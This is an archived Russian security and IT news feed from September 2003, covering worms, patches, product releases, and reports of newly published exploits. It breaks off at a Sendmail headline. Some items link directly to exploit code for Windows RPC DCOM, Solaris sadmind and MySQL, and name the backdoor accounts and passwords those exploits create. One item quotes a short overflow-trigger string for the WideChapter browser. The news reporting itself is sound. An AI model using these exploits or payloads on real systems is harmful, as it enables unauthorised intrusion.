Компания ACD Systems, разработчик популярной программы для просмотра и редактирования цифровых изображений ACDSee, собирается в ближайшее время выпустить следующую версию программы - ACDSee 6.0. Официально о премьере пока не сообщалось, но некоторым сетевым издательствам уже стали известны первые подробности о свежем релизе. Cреди нововведений: возможность записывать цифровые фотографии на оптические носители (CD или DVD), обновленная система создания фотоархивов, новый интерфейс, поддерживающий разнообразные "скины". Кроме того, в очередной версии будет реализована интересная функция быстрого поиска фотографий. Пользователь сможет задать для групп изображений ключевые слова, по которым и будет производиться поиск в базе данных. Улучшения коснулись и графического редактора ACDSee, который, как известно, в трудные моменты может заменить Photoshop. Теперь в него добавлены различные фильтры, которые, по заверению разработчиков, позволяют заметно улучшить качество изображения. Источник - http://www.compulenta.ru
22/09/2003 14:51 Сайт по безопасности российского представительства компании Microsoft.
Как сообщает compulenta, российское подразделение корпорации Microsoft открыло сайт, посвященный проблемам компьютерной безопасности. Главной целью сайта будет ознакомление пользователей и специалистов в сфере информационных технологий с возможностями продуктов Microsoft по повышению безопасности компьютерных систем всех уровней. Там можно найти информацию о новых продуктах Microsoft, а также образовательных программах и семинарах по вопросам информационной безопасности. Девизом нового сайта Microsoft является фраза: "Пора сменить код". На место устаревшим системам с серьезными проблемами в области безопасности и надежности должны придти современные программные платформы. В их основе должны лежать операционные системы Windows Server 2003 и Windows XP, офисные продукты серии Office 2003 и пакета ISA Server 2000. На сайте также доступны справочная информация о построении безопасной информационной инфраструктуры на базе решений Microsoft, а также описание учебных программ для специалистов в области ИТ, некоторыми из которых можно воспользоваться бесплатно. Адрес сайта - http://www.microsoft.com/rus/SecureInfrastructure/
22/09/2003 14:26 IBM модернизирует электронную почту Lotus.
IBM планирует анонсировать апгрейд для своего клиента e-mail Lotus Notes с добавлением новых функций поиска и немедленного обмена сообщениями. Новая версия Notes/Domino Workplace 6.5 призвана обеспечить офисных служащих более широкими функциональными возможностями внутри окон e-mail, обычно открытых на их ПК. Апгрейд включает функции обмена сообщениями, основанные на IBM Sametime. Служащие смогут видеть, доступны ли их коллеги в онлайне, и обмениваться сообщениями в том же самом окне, которым они пользуются для обращения к электронной почте и информации календаря. Новые функции обмена сообщениями и коллективной работы IBM дополнила рядом сопутствующих продуктов. С 1 октября по 31 декабря заказчики Lotus 6.5, заключившие соглашения на активное техническое обслуживание, смогут получить бесплатный пакет из 20 лицензий IBM Lotus Instant Messaging и лицензию на 20 пользователей WebSphere Portal Express, ПО коллективной работы IBM для малых и средних предприятий. Подробности - http://zdnet.com.com/2100-1104_2-5079441.html
22/09/2003 13:18 Panda Software выпускает бесплатную утилиту для борьбы с червем W32/Gibe.C.
Вариант «С» червя Gibe (W32/Gibe.C) (он же Swen - по классификации других антивирусных компаний), обнаруженный еще 18 сентября, стал вирусом, наиболее часто обнаруживаемым на компьютерах пользователей с помощью бесплатной онлайновой антивирусной программы Panda ActiveScan. В связи с растущим количеством заражений компания Panda Software выпустила бесплатную утилиту PQREMOVE. Gibe.C использует две уязвимости в браузере Microsoft Internet Explorer для того, чтобы самозапуститься в тот момент, когда пользователь просматривает зараженное письмо в окне быстрого просмотра. И, наконец, этот червь распространяется через каналы IRC и систему файлообмена KaZaA. Для получения доступа к закачке утилиты необходимо провести регистрацию на сервере после выбора версии червя, который Вы хотите удалить. Утилита - http://www.pandasoftware.com/download/utilities/
22/09/2003 13:11 Microsoft снабжает японских пользователей низкоскоростного интернета компакт-дисками с обновлениями Windows XP
Японское отделение Microsoft 20 сентября начало бесплатное распространение компакт-дисков с обновлениями и патчами для операционной системы Windows XP, сообщает агентство "Синьхуа". По словам представителей компании, акция предназначена в первую очередь для пользователей низкоскоростных соединений с интернетом и позволит избежать им долгого скачивания необходимых материалов. Распространяя компакт-диски с обновлениями и патчами через сеть основных японских магазинов, занимающихся продажей компьютерной техники, Microsoft намеревается повысить устойчивость своей операционной системы к хакерским атакам и вирусам. Сведений о количестве дисков, которые клиенты смогут получить до 30 октября, не приводится. В компании сообщили о готовности выпустить дополнительный тираж в случае необходимости. Источник - http://www.viruslist.ru
21/09/2003 17:30 Ещё один эксплоит уязвимости в RPC DCOM.
Похоже, ребята из китайской группы Xfocus решили отточить мастерство в части написания эксплоитов на примере недавно обнаруженной уязвимости в службе RPC DCOM. член команды под ником flashsky опубликовал на сайте группы статью под названием "The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows". В статье довольно подробно описывается сама суть переполнения буфера в RPC DCOM. Заканчивается же статья кодом эксплоита, который сам автор назвал RPCDCOM2.c ver1.1. Существует, правда, одна загвоздка. Автор указывает, что код работает в китайских версиях Win2K (SP3 и SP4) с установленным патчем от M$03-026 (напомним, что уязвимость закрывается патчем, описанным в MS03-039). Для работы с другими версиями необходимо "поработать" с CEH. В результате выполнения кода в ситеме пользователь SST с паролем 557 (группа - administrator). Подробности - http://www.xfocus.org/documents/200309/4.html
21/09/2003 16:47 Уязвимость в Solaris.
Господа из iDEFENSE обнаружили уязвимость в пакете удалённого администрирования, применяемого в ОС Solaris - sadmind, Solstice AdminSuite. Собственно, сам пакет прдназначен для упрощения жизни СИСАДМИНу, который может удалённо (и централизованно) администрировать свой сервер. Демон sadmind установлен в Solaris По умолчанию и доступен через службу RPC (Remote Procedure Call). Уязвимост связана с некорректной обработкой демоном запроса AUTH_SYS, что позволяет удалённому атакующему, миную фазу авторизации выполнить в системе произвольный код. Для этого необходимо сформировать специальный RPC-запрос. Уязвимость была обнаружена в версиях Solaris 2.x, 7, 8, 9. Sun Microsystems выпущен соответствующий патч. Тем не менее, господин с ником H D Moore выпустил рабочий эксплоит (на Перле), позволяющий выполнить заданную команду на сервере. Подробности - http://www.idefense.com/advisory/09.16.03.txt Эксплоит - http://www.metasploit.com/tools/rootdown.pl
21/09/2003 15:09 Статья о DNS.
На сайте Opennet.ru, периодически радующего *nix-сообщество различными статьями, равно как и ссылками на них, опубликовал довольно интересную статью под названием "DNS-доменная служба имён", автор которой - Максим Мамаев из Владивостокского государственного университета экономики и сервиса. Сама статья, собственно. представляет собой лабораторный практикум по теме (предмету?) "Технологии Интернет". Возможно, статья позволит вам узнать кое-что новое для себя в работе сервиса DNS (а для кого-то станет и подробным описанием работы оной). Статья - http://www.opennet.ru/docs/RUS/dns1/index.html
21/09/2003 14:36 FreeBSD: -b патч для ipfw2.
Как сообщают на sysadmins.ru, Один из разработчиков FreeBSD - Луиджи Риззо, подготовил патч для ipfw2, который добавляет вызов возврата команды ipfw -b, позволяя просмотреть информацию о номере, счетчиках, действях и комментариях, которые до сих пор, предоставлялись в неудобной форме, особено если список правил достаточно велик, когда комментарии действительно необходимы для простого и удобного чтения. Со слов автора, этот патч не будет добавлен в ветку 4.9, из-за нехватки времени, но он предполагает, что патч может быть полезен уже сейчас широкой аудитории пользователей FreeBSD. Также, у Луиджи имеется несколько патчей для логирования работы ipfw. Подробности - http://www.bsdforums.org/forums/showthread.php?threadid=14181
21/09/2003 11:07 Cтатья о создании SSL-сертификатов.
На одном питерском сайте опубликована довольно интересная и, главное, довольно короткая статья о создании SSL-сертификатов в связке Apache и mod_ssl. Как утверждает сам автор (Сергей Карасев), статья не является дословным переводом документа с сайта slacksite.org. Думается, статья будет довольно полезна многим администраторам, которые вынуждены связываться с технологией SSL для обеспечения защищённого канала при работе с Вэб-сервером Apache. Cтатья - http://blog.spb.ru/apache_modssl.html
21/09/2003 10:35 BIND "бойкотирует" службу Verisign Site Finder.
Ассоциация Internet Software Consortium опубликовала особую "заплату" для выпускаемой ею службы BIND, которая применяется на 80% серверов системы доменных имен Internet. После установки обновления BIND начинает блокировать доступ к службе Site Finder фирмы VeriSign. Данная служба, когда пользователь вводит адрес сайта в подведомственных VeriSign доменах .net или .com с опечатками, заставляет браузер вместо вывода сообщения об ошибке HTTP 404 переходить на поисковую систему VeriSign, предлагая альтернативные варианты написания доменного имени. В ISC убеждены, что при помощи Site Finder в VeriSign собираются продавать рекламу. Кроме того, специалисты ассоциации в качестве аргумента в пользу выпуска обновления приводят тот факт, что служба VeriSign блокирует сообщения о несуществующих доменах не только в случае с Web-серверами, но также с серверами электронной почты, что приводит к их некорректной работе. Источник - http://www.osp.ru
20/09/2003 14:32 Возможность переполнения буфера в MC.
Илья Тетерин aka buggzy написал письмо в адрес BUGTRAQ, в котором констатирует возможность переполнения буфера в популярном в мире открытых систем файлового браузера MC - Midnight Commander. Как пишет сам автор, MC использует неинициализированный буфер для обработки символических ссылок в виртуальной файловой системе (VFS), которая используется при работе с программами tar, cpio (работа с архивами, например). Эта ошибка обнаружена в файле vfs/direntry.c, где массив buf в функции vfs_s_resolve_symlink() имеет вид buf[]. Для демонстрации возможности переполнения буфера в стеке автором был написан специальный архивный файл, при раскрытии которого MC благополучно падает. Проверялось на версиях MC 4.5.52 - 4.6.0. Пример эксплоита - http://buggzy.narod.ru/exp.tgz
20/09/2003 13:29 Цикл статей "Windows, подвинься!"
На LinuxCenter вышел цикл статей под названием "Windows, подвинься!", описывающий процесс установки Linux на компьютер с установленной Windows. Детально рассмотрен процесс предварительной настройки файловой системы к приему новой операционной системы, а также способы изменения геометрии логических дисков при помощи средств Linux и Windows. О статьях сообщил на linux.org.ru - ru_classic. Наверняка будут представлять большой интерес для новичков, отважившихся поставить на машину с установленной ОС Windows Linux. Статьи - http://linuxcenter.ru:8081/lib/gohome/in.phtml
20/09/2003 13:16 Mozilla 1.5 Release Candidate 1.
Доступен для загрузки первый Release Candidate 1 (RC1). Перед окончательным выпуском ожидается, по крайней мере, еще один RC. Подробнее - http://www.mozilla.org/releases/mozilla1.5rc1/
20/09/2003 12:59 Выпуск программного комплекса "Кондор".
Digital Security объявила о выпуске Кондора - программного комплекса проверки информационной системы компании на соответствие требованиям международного стандарта управления информационной безопасностью ISO 17799. Комплекс включает в себя более двухсот вопросов, после ответа на которые можно получить подробный отчет о состоянии своей информационной системы на текущий момент, включающий положения стандарта, которым система удовлетворяет и которым не удовлетворяет, комментарии, рекомендации и т.п. Подробнее - http://www.dsec.ru/soft/kondor.php
20/09/2003 12:05 Конфиденциальная информация нуждается в защите.
Не так давно группа исследователей из Массачусетского технологического института провела исследование, целью которого было определить, насколько тщательно подходят пользователи к сокрытию конфиденциальной информации, которая потенциально может попасть в руки злоумышленников при продаже устаревшего электронного оборудования. Результаты повергли ученых в шок. Оказалось, что из 129 жестких дисков, приобретенных на аукционе в eBay, только 12 оказались «чистыми» - все остальные содержали ту или иную информацию, распространение которой наверняка не понравилось бы их прежним владельцам. Так, например, на одном из дисков оказалось 3722 «удаленных» номера кредитных карточек, данные о которых исследователям удалось восстановить при помощи простейших программ, имеющихся в распоряжении едва ли не каждого пользователя. Но больше всех поразил ученых жесткий диск, некогда установленный в банкомате, - устройство содержало не только регистрационные данные об операциях, совершенных банкоматом, но и сведения о счетах клиентов и остатках денежных средств по ним. Самое интересное, что, судя по состоянию записей на диске, технические специалисты банка даже и не пытались уничтожить имевшуюся на диске информацию, продав винчестер «как есть». Источник - http://www.crime-research.org
20/09/2003 11:51 Юго-Восточная Азия создаст масштабную структуру для борьбы с хакерами, вирусописателями и пиратами.
Ассоцицация стран Юго-Восточной Азии (The Association of South East Asian Nations, ASEAN) объявила о намерении создать к 2005 году единую структуру по борьбе с пиратством и компьютерными вирусами. В задачу нового ведомства будет входить выявление слабых мест в системе компьютерной безопасности и предупреждение вирусных и хакерских угроз. К 2005 году в рамках единой структуры ASEAN будут созданы специальные подразделения быстрого реагирования (Computer Emergency Response Teams, CERT). На них будут возложены обязанности по противодействию хакерским атакам и вирусным эпидемиям, а также ликвидации последствий этих событий. Сотрудники CERT будут взаимодействовать и со своими коллегами из региональных структур, связанных с обеспечением компьютерной безопасности. Источник - http://www.viruslist.com
20/09/2003 10:42 Solaris перенимает армейские приемы.
Следующая версия операционной системы Sun будет содержать средства защиты из Trusted Solaris, разработанной при участии правительства США и военных. Sun Microsystems объявила, что в следующую версию ее операционной системы войдут усиленные средства обеспечения безопасности, разработанные компанией в тесном сотрудничестве с армейскими и разведывательными ведомствами США. Система с кодовым названием Solaris Next, которой предположительно будет присвоено имя Solaris 10, вберет в себя функции, которые сейчас присутствуют только в Trusted Solaris — специализированной версии серверной операционной системы, разработанной при участии правительственных и военных ведомств и используемой ими. Директор по стратегии Sun Марк Толливер в своем выступлении на конференции SunNetwork в Сан-Франциско сказал, что компания еще не приняла окончательного решения по названию платформы и ценам, но пообещал выпустить ее во втором полугодии 2004 года. «Следующая версия Solaris, Solaris Next, будет включать элементы Trusted Solaris, в том числе ролевой доступ», — сказал он. Толливер добавил, что заказчики смогут оценить некоторые новые функции еще до официального выпуска продукта при помощи запущенной во вторник схемы Software Express, которая позволяет зарегистрированным пользователям обращаться к важным компонентам ПО Sun. Подробности - http://www.zdnet.ru/?ID=306794
19/09/2003 17:19 Новый вирус Swen/Gibe.F использует Web-счётчик.
В BUGTRAQ опубликовано письмо Richard M. Smith, в котором автор пишет, что Джо Стюартом проведено исследование нового червя Swen/Gibe.F (мы сообщали о нём вчера). Оказалось, что для регистрации количества заражённых машин используется счётчик на некоей Вэб-странице одного чешского сайта. В качестве этой страницы указывается следующий URL - http://ww2.fce.vutbr.cz/bin/counter.gif/link=bacillus&width=6&set=cnt006. На момент 2:30 EST было зафиксировано 615.000 машин (заражённых?). Надо полагать, что после опубликования этого письма количество "заражённых" машин должно, по идее, возрасти - поскольку определённое количество читателей BUGTRAQ сунутся посмотреть на эту страницу. ;) Более подробно о черве - http://news.com.com/2100-7349_3-5078696.html
19/09/2003 16:14 IBM и General Electric создали систему тотальной безопасности локальных сетей.
Компании IBM и General Electric объявили о создании комбинированной системы контроля безопасности корпоративных компьютерных сетей. По информации агентства Associated Press, новый проект предусматривает совместное использование локальных сетей с системой общего наблюдения, установленной в здании. Воспользовавшись разработкой IBM и General Electric, клиенты смогут значительно повысить степень безопасности локальных сетей. Например, если оператор системы общего наблюдения видит, что сотрудник компании покинул рабочее место на долгое время, его компьютер становится недоступным для других лиц. Доступ к сети будет запрещен даже в том случае, если постороннему пользователю будут известны логин и пароль отсутствующего в здании человека. Система также откажется впустить сотрудника в здание в случае, если в другом здании компании уже работает компьютер с его учетной записью. В IBM и General Electric полагают, что новый продукт окажет компаниям хорошую услугу в деле борьбы с кражей паролей и электронных пропусков. Некоторые компании уже пытались внедрить системы, подобные разработке IBM и General Electric. Однако на широкой коммерческой основе такой продукт появляется впервые. Источник - http://www.viruslist.ru
19/09/2003 15:39 Выход сентябрьского номера Crypto-Gram.
15 сентября вышел сентябрьский номер еженедельного журнала, посвящённого проблемам криптографии и компьютерной безопасности Crypto-Gram. Об этом оповестил всю компьютерную общественность Bruce Schneier, основатель и руководитель компании Counterpane Internet Security, Inc., которая и занимается поддержанием и наполнением этого электронного журнала. Представлены разделы: Accidents and Security Incidents, "Beyond Fear" Reactions, Crypto-Gram Reprints, Licensing Computer Users, News, Counterpane News, Security Notes from All Over: Hats in Banks, Benevolent Worms, California's Security-Breach Disclosure Law. Подробности - http://www.schneier.com/crypto-gram-0309.html
19/09/2003 12:37 Хакеры атакуют через порты 135, 139 и 445.
Компания Counterpane Internet Security, занимающаяся вопросами безопасности информационных систем, предоставила первый пример работающего кода, который использует последнюю из обнаруженных критических уязвимостей в Windows. Используя ее, злоумышленники могут запускать на атакуемом компьютере собственный код, причем настоящий владелец ПК может вообще не выполнять никаких действий вроде открытия почтовых вложений и т.д. Используемая уязвимость описана среди других в бюллетене MS03-039. Специалисты из Counterpane протестировали опасный код (который был найден, кстати, на одном из публичных веб-сайтов) в своей лаборатории и обнаружили, что он позволяет захватить контроль над удаленной системой. Теперь высказывание из не так давно опубликованной новости «Это свершится, торопитесь “залатать” систему» можно смело заменить другим, «Оно здесь. Мы его видели. Вы должны поставить патч немедленно», отмечают в Counterpane. Особенно опасна уязвимость для индивидуальных и домашних пользователей, а также при подключении к локальным сетям мобильных устройств типа ноутбуков, поскольку корпоративные межсетевые экраны достаточно надежно защищают локальные стационарные системы от нападения через порты 135, 139 и 445. Источник - http://www.cnews.ru
19/09/2003 12:32 Российскому интернету - 13 лет.
Тринадцать лет. Именно такой своеобразный юбилей отмечает сегодня отечественный интернет. Дело в том, что 19 сентября 1990 года Советский Союз официально зарегистрировал домен .su (Советский Союз). В 1993 году, после развала СССР России пришлось регистрировать другое доменное имя - .ru, а .su заморозить (правда, этим летом бывший домен СССР вновь стал доступен). Отечественное интернет-движение зародилось в СССР еще до того, как был зарегистрирован первый домен. В интервью "Известиям" директор первого российского провайдера, компании "Демос", Андрей Васильев рассказал, что все началось после принятия в 1989 году "Закона о кооперации", который разрешил создавать кооперативы, а значит, ввозить компьютерную технику. Именно на средства, вырученные от продаж ПК, и развился на первых порах отечественный интернет. Любопытно, что впервые интернет серьезно заявил о себе во время августовского путча 1991 года. Тогда о последних событиях из Кремля узнавали, в основном, по интернету. В настоящий момент Рунетом охвачено, по разным данным, от 5% до 10% населения России, т.е. около 11,5 млн. человек. Самым популярным местом доступа в Сеть остается работа, на втором - дом, интернет-клубы и кафе занимают пятое место. По процентному соотношению численности населения и количества пользователей интернета Россия находится на одном уровне с Бразилией, а по абсолютному числу пользователей обогнала такие страны, как Австралия, Швеция и Испания. Источник - http://www.compulenta.ru
19/09/2003 12:04 Очередное обновление для Internet Explorer.
Компания Microsoft сообщила о выпуске очередного обновления для браузера Internet Explorer. Оно не связано с безопасностью и предназначено для тех пользователей, кто сталкивался с "падением" браузера в ОС Windows XP. Сбой вызван программными ошибками и происходит при переключении визуальной темы на стиль Windows XP. Выпущенный Microsoft патч можно скачать здесь (объем файла 1354 кб). В Microsoft рекомендуют устанавливать обновление только тем пользователям, кто действительно сталкивался с "падением" браузера. Альтернативным способом избавиться от проблемы является использование классического стиля оформления Windows. Более тщательно протестированная версия обновления будет включена во второй сервис-пак для IE 6, который, по данным сайта Bink.nu, выйдет ближе к концу года. Подробности - http://support.microsoft.com/default.aspx?kbid=822350
19/09/2003 11:01 Великобритания будет преследовать спамеров в уголовном порядке.
С целью остановить поток спама в электронных почтовых сетях власти Великобритании объявили несанкционированную рассылку писем уголовным преступлением, сообщает BBC. Согласно новому закону, решением магистратских судов спамеры могут быть подвержены штрафу в размере 5 тысяч фунтов. В случае рассмотрения дела о спаме с участием жюри присяжных сумма штрафа не ограничивается. Тем не менее, тюремное заключение спамерам не грозит. "Очень важно, чтобы люди чувствовали себя спокойно при пользовании электронными технологиями. Эти меры поспособствуют борьбе с несанкционированной рассылкой", - прокомментировал нововведения министр связи Великобритании Стивен Тиммс. Закон, согласно которому компании должны будут получать от частных адресатов предварительные разрешения на отправку писем, вступит в силу с 11 декабря. Впрочем, нововведения не коснутся корпоративных адресов. Подробнее - http://www.lenta.ru/internet/2003/09/18/spam/
19/09/2003 10:34 Специалисты по компьютерной безопасности ждут нового супер-червя.
Новый сетевой червь, поражающий операционную систему компьютера, может появится в самое ближайшее время, сообщает сайт BBC News. Специалисты по компьютерной безопасности обращают внимание на то, что хакеры по всему миру обмениваются сведениями о новых "дырах" в Windows. Бушевавший в августе вирус MSBlast (или Lovsan), отмечают эксперты, выбирал сходные точки для своего удара. По их словам, поставить "заплатки", доступные на сайте компании Microsoft, на свои компьютеры всем пользователям нужно уже сейчас. Как считают в занимающейся компьютерной безопасностью компании iDefense, вирусные атаки могут начаться уже через несколько дней. По мнению некоторых специалистов, время между обнаружением очередного уязвимого места в программном обеспечении и моментом, когда им воспользуются какие-нибудь злоумышленники, катастрофически сокращается. Кроме того, говорят они, с MSBlast началась новая эра интернет-вирусов, так как он был первым автоматическим червем содержавшим активную "боеголовку" и мог атаковать сайт Microsoft, содержащий обновления для Windows на текущий день. А его предшественники, находясь в постоянном поиске новых серверов и компьютеров, просто перегружали сетевые соединения большими потоками данных. Подробности - http://news.bbc.co.uk/2/hi/technology/3119316.stm
18/09/2003 19:00 IEEE выпустит стандарт по безопасности операционных систем.
Институт инженеров по электротехнике и электронике (Institute of Electrical and Electronics Engineers, IEEE) начал разработку стандарта для определения основных требований к обеспечению безопасности “коробочных” операционных систем общего назначения. Стандарт IEEE P2200 "Основы безопасности операционной системы” (Base Operating System Security, BOSS) будет касаться проблем с безопасностью систем, возникающих из-за инженерных недоработках в ОС. Стандарт будет обращен к важнейшим функциям кросс-платформенной безопасности, включая идентификацию, контроль доступа и криптографию. Стандарт, который должен увидеть свет до конца 2004 года, будет построен на основании указаний Американского национального института по стандартам и технологиям и в терминах, принятых Международной организацией по стандартизации (International Organization for Standards, ISO). Источник - http://www.cnews.ru
18/09/2003 16:33 Эксплоит уязвимости в Windows RPC DCOM.
На том же самом сайте опубликован эксплоит ещё одной уязвимости - в службе RPC DCOM. Написан для win32. Как следует из описания, использует переполнение буфера при задании длиннного имени файла. При успешном запуске в системе создаётся пользователь с именем "e" и паролем "asd#321". Автор - ey4s из Китайской компании XFocus. Исходник - http://packetstorm.linuxsecurity.com/0309-exploits/09.16.MS03-039-exp.c
18/09/2003 15:26 Эксплоит уязвимости MySQL-сервера.
Опбуликован эксплоит узявимости, позволяющей удалённо проламывать сервера с установленной СУБД MySQL, предствляющей собой популярную в мире открытых систем СУБД для работы с SQL-запросами. Как написано в комментарии, использует уязвимость в MySQL версий 3.23.x/4.0.x. Эксплоит - http://packetstorm.linuxsecurity.com/0309-exploits/09.14.mysql.c
18/09/2003 14:12 Крупный сбой в системе банкоматов Сбербанка.
Из-за технического сбоя в сети банкоматов "Сбербанка", вызванного установкой нового сервера, весь вторник клиенты не могли снять средства со своих счетов. При попытке получить деньги, держатели пластиковых карт не могли снять наличные, при этом сами счета обнулялись, пишет "Коммерсантъ". В Сбербанке объяснили трудности со снятием денег техническим сбоем, связанным с "запланированным перевооружением процессингового центра и установкой нового, более мощного сервера". "Возможно, плохо провели инсталляцию", - заявил "Ведомостям" директор управления общественных связей Сбербанка Вячеслав Корнев. Он подчеркнул, что количество отказов составило менее 1% от всех совершенных вчера операций. Кроме того, период проведения технических работ совпал со значительным ростом операций по снятию наличных средств через банкоматы из-за массовых возвращений из отпуска, что привело к увеличению числа отказов системы. Работа сети банкоматов была восстановлена уже к вечеру, однако владельцы "обнуленных" счетов смогут получить свои средства только через несколько дней. За эти дни банк обязуется выплатить пострадавшим проценты, отметили в Сбербанке. Подробности - http://www.kommersant.ru/archive/archive-today.html?issueId=13628
18/09/2003 14:08 Автор вируса Melissa сдал ФБР нескольких хакеров.
На нынешней неделе появилась новая информация об обстоятельствах суда над автором почтового вируса Melissa Дэвидом Смитом. Автор Melissa был арестован еще в 1999 году, а в 2002 г. ему был вынесен приговор. Смит получил 20 месяцев лишения свободы, хотя судья мог назначить наказание в виде тюремного срока до десяти лет. Как выяснилось, причиной относительной мягкости приговора стало согласие Смита сотрудничать с ФБР в поимке других хакеров. Сотрудничество с властями автор Melissa начал практически сразу после ареста. По информации агентства Associated Press, Смит сдал властям, по меньшей мере, двух других вирусописателей. В 2001 г. он сообщил ФБР известные ему координаты авторы червя Anna Kournikova Яна Девита, который впоследствии сдался властям. Позднее в том же 2001 году Смит передал ФБР записи своих переговоров с британцем Саймоном Вэллором, создавшим вирус Gokar. Источник - http://www.compulenta.ru
18/09/2003 13:34 еSafe защитит от Sobig.f и многих других.
Российский холдинг ЛАНИТ решил оказать помощь своим клиентам при выборе эффективного средства защиты от вирусов. В связи с этим в начале сентября ЛАНИТ объявил программа по продвижению новой, четвертой версии антивирусной системы eSafe. Пакет eSafe был разработан компанией Aladdin Knowledge Systems, которая специализируется в области средств защиты информации. eSafe позволяет обезопасить шлюзы глобальной сети Интернет, почтовые сервера и контроллеры доменов. Программа в реальном времени сканирует весь HTTP-, SMTP- и FTP-трафик, пытаясь обнаружить и нейтрализовать враждебный код Java/ActiveX, блокировать опасные сценарии Java/VB, содержащиеся в веб-страницах и присланных по электронной почте сообщений в формате HTML. eSafe также защищает почту от спама и подложных писем и удаляет макросы из вложенных в электронные послания документов Microsoft Office. Новая версия eSafe обладает рядом преимуществ перед конкурирующими продуктами. Она "прозрачна" для пользователя, а ее инсталляция и администрирование не требуют серьезных временных затрат. Масштабируемая система eSafe не чувствительна к пиковым нагрузкам трафика. Данное решение можно оптимальным образом интегрировать в существующую корпоративную сеть и обеспечить, тем самым, комплексную защиту всей инфраструктуры. Стоит отметить, что пакет eSafe установлен в таких организациях, как Госкомитет РФ по статистике, Внешторгбанк, а также в ряде коммерческих банков и государственных учреждений. Подробнее - http://www.isecurity.ru/
18/09/2003 13:00 "Корвет-Телеком" (Москва) нанес удар по доморощенным хакерам.
По сообщению компании "Корвет-Телеком" (Москва), за август и сентябрь этого года было выявлено три абонента, пользовавшихся услугами территориальной сети "PIKENET" и использовавших чужие сетевые реквизиты для работы в сети. Абоненты отключены от сети. Им выставлены требования на оплату понесенных компанией убытков и штрафных санкций в размере удвоенной суммы убытков. В случае отсутствия оплаты, данные абоненты будут лишены возможности подключения к сетям компании и сведения о них будут переданы правоохранительным органам. Источник - http://www.corvette-telecom.ru/
18/09/2003 12:47 Коалицию против спама попытались дискредитировать.
Сегодня многие пользователи обнаружили в почтовых ящиках спам о проведении конференции "Проблема спама и ее решения". Сей факт оказался попыткой дискредитации организаторов выше указанного мероприятия. Сообщение о том, что подобная акция является провокацией, разместили на своих сайтах многие из организаторов конференции. В частности, в подготовленном совместными усилиями обращении говорится: «Становится совершенно очевидно, что бороться нужно не с теми, от чьего лица производится рассылка, а с непосредственными исполнителями. Ведь в коалицию, кроме компании "Ашманов и Партнеры", которой принадлежит доменное имя spamtest.ru, входят такие известные организации как "Лаборатория Касперского", российское представительство Microsoft, "Голден Телеком", Mail.Ru, Subscribe.Ru, Rambler». Сама рассылка содержит стандартное приглашение на конференцию. В качестве обратного адреса был указан адрес оргкомитета - orgcom@spamtest.ru. Организаторы конференции отмечают, что идея провести подобную рассылку была высказана на одном из спамерских форумов еще 9 сентября. Источник - http://www.runet.ru
18/09/2003 12:15 Интернет-мошенники устроили фальшивую рассылку для клиентов британского банка.
Клиенты британского банка Barclays получили электронные письма с просьбой сообщить администрации ряд своих персональных данных, в том числе персональный идентификационный номер (PIN) и пароль. Для убедительности в тексте письма содержалась ссылка на сайт, внешне очень напоминающий веб-страницу банка. Как уверяют в самом Barclays, руководство банка не имеет к рассылке никакого отношения, сообщает Inicio.com. "Barclays никоим образом не связан с этим письмом, и указанный в нем портал нам не принадлежит", - сообщила пресс-секретарь банка. Она также добавила, что о получении поддельного письма в Barclays сообщили около 400 клиентов. Восемь из них последовали присланным инструкциям. Во избежание неприятностей банк заморозил счета поддавшихся на обман, а также пообещал компенсировать связанные с мошенничеством потери. Пресс-секретарь банка отметил, что Barclays оказывает услуги в режиме онлайн почти 3,5 миллиона клиентов и никогда не требует от них сообщать в письмах какие-либо персональные данные. До окончательного решения проблемы с фальшивой рассылкой руководство банка приняло решение ограничить сумму вкладов клиентов до 500 фунтов стерлингов (700 евро). Источник - http://www.viruslist.ru
18/09/2003 11:52 Внимание! Обнаружен червь I-Worm.Swen.
"Лаборатория Касперского" сообщает об обнаружении нового интернет-червя I-Worm.Swen. Червь размножается через электронную почту, сеть файлообмена Kazaa и каналы IRC. Зараженные письма в качестве отправителя могут содержать различные службы компании Microsoft, например MS Technical Assistance, MS Internet Security Section и прочие. Текст письма призывает пользователя установить специальный патч для продуктов Microsoft, якобы устраняющий "все известные уязвимости". По информации экспертов "Лаборатории Касперского", на настоящий момент заражению I-Worm.Swen подверглось более 30000 компьютеров по всему миру. Их число продолжает увеличиваться. Для детектирования червя уже выпущено срочное обновление баз данных Антивируса Касперского. Источник - http://www.kaspersky.ru
18/09/2003 10:45 И ещё раз об ошибке в SSH.
Ранее мы писали об уязвимости в популярном в мире открытых систем приложении SSH, позволяющем администраторам (и пользователям) удалённо работать с сервером по каналу, защищённому криптографически. На сайте zdnet.ru опубликована статья Патрика Грея под названием "Пробел в защите SSH обнажает сети" (была опубликована на сайте News.com). Вот вкратце, так сказать, основные тезисы этой статьи. Секьюрити-сообщество не сразу распознало угрозу, но вчера робкие подозрения и слухи превратились в тревожное предостережение. Главный специалист американской фирмы eEye Digital Security Марк Мейффрет сообщил по телефону ZDNet Australia, что угроза может оказаться очень серьезной. «Для большинства сетей это практически отмычка», — сказал он. Для Unix-систем не редки случаи, когда уязвимость эксплуатируется подпольным сообществом месяцами, говорит Мейффрет. «С уязвимостями SSH такое случалось и раньше... это явно больная тема для Unix-уязвимостей». Специалист по защите данных Марк "Simple Nomad" Лавлес, сотрудничающий с BindView Corporation, не сомневается в существовании эксплойта для данной уязвимости. «У кого-то есть эксплойт... многие заявляют, что располагают им, и похоже, что некоторые не врут», — сказал он в интервью по телефону. По его словам, уязвимы все версии OpenSSH, установленные на любых дистрибутивах Linux и BSD, исключая те, что были обновлены на версию 3.7.1 в течение последних часов. Лавлес говорит, что на самом деле в ПО две уязвимости. «Версия 3.7 вышла рано утром, а уже через пару часов появилась версия 3.7.1. Я подозреваю, что 3.7 исправляет один баг, а 3.7.1 — другой». Однако не исключено, что существуют смягчающие факторы. «Ходят слухи о том, что для работы эксплойта необходимо, чтобы был разрешен удаленный вход в SSH на уровне root, — говорит Лавлес. — Но это только слухи». По его словам, нужно как можно скорее провести апгрейд на 3.7.1. «Код эксплойта распространится за считанные часы», — предупредил он. Статья - http://www.zdnet.ru/?ID=306742 Патч и рекомендации - http://www.openssh.com/txt/buffer.adv
17/09/2003 23:34 Переполнение буфера в браузере WideChapter.
Bahaa Naamneh (b_naamneh(at)hotmail.com) обнаружил, что не особенно распостраненный довесок к IE оказался подверженным переполнению буфера ссылкой в более 517 символов - "[script]window.open(http://AAA.. [Ax517])[/script]". Источник - http://www.securityfocus.com
17/09/2003 23:09 Удаленное переполнение буфера в почтовом сервере Sendmail.
